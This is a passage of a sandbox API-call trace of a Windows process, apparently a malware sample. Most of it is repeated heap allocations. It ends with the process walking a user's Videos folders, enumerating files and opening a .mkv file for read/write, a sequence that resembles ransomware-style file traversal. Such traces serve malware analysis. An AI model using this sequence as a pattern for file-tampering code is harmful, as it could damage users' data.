(HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.336] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\") returned="Y5X8\\" [0196.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.336] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0196.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.336] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0196.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce00 [0196.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.337] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0196.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ce00 | out: hHeap=0x6a0000) returned 1 [0196.337] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.338] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.338] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.338] PathFindFileNameW (pszPath="") returned="" [0196.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.338] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa368b10, ftCreationTime.dwHighDateTime=0x1d8a2f7, ftLastAccessTime.dwLowDateTime=0xb99b1390, ftLastAccessTime.dwHighDateTime=0x1d8a72b, ftLastWriteTime.dwLowDateTime=0xb99b1390, ftLastWriteTime.dwHighDateTime=0x1d8a72b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.339] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa368b10, ftCreationTime.dwHighDateTime=0x1d8a2f7, ftLastAccessTime.dwLowDateTime=0xb99b1390, ftLastAccessTime.dwHighDateTime=0x1d8a72b, ftLastWriteTime.dwLowDateTime=0xb99b1390, ftLastWriteTime.dwHighDateTime=0x1d8a72b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.339] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x133d7f20, ftCreationTime.dwHighDateTime=0x1d8a6ad, ftLastAccessTime.dwLowDateTime=0xdaa3fa50, ftLastAccessTime.dwHighDateTime=0x1d8a6c4, ftLastWriteTime.dwLowDateTime=0xdaa3fa50, ftLastWriteTime.dwHighDateTime=0x1d8a6c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0o41ZS", cAlternateFileName="")) returned 1 [0196.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0196.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0196.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47bb8 [0196.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0196.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0196.340] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcf5e60, ftCreationTime.dwHighDateTime=0x1d8a5b4, ftLastAccessTime.dwLowDateTime=0x96f81f40, ftLastAccessTime.dwHighDateTime=0x1d8a5fa, ftLastWriteTime.dwLowDateTime=0x96f81f40, ftLastWriteTime.dwHighDateTime=0x1d8a5fa, nFileSizeHigh=0x0, nFileSizeLow=0xb883, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="32xDz.mkv", cAlternateFileName="")) returned 1 [0196.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0196.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.341] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\32xDz.mkv") returned=".mkv" [0196.341] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\32xDz.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\32xdz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.343] GetFileSizeEx (in: 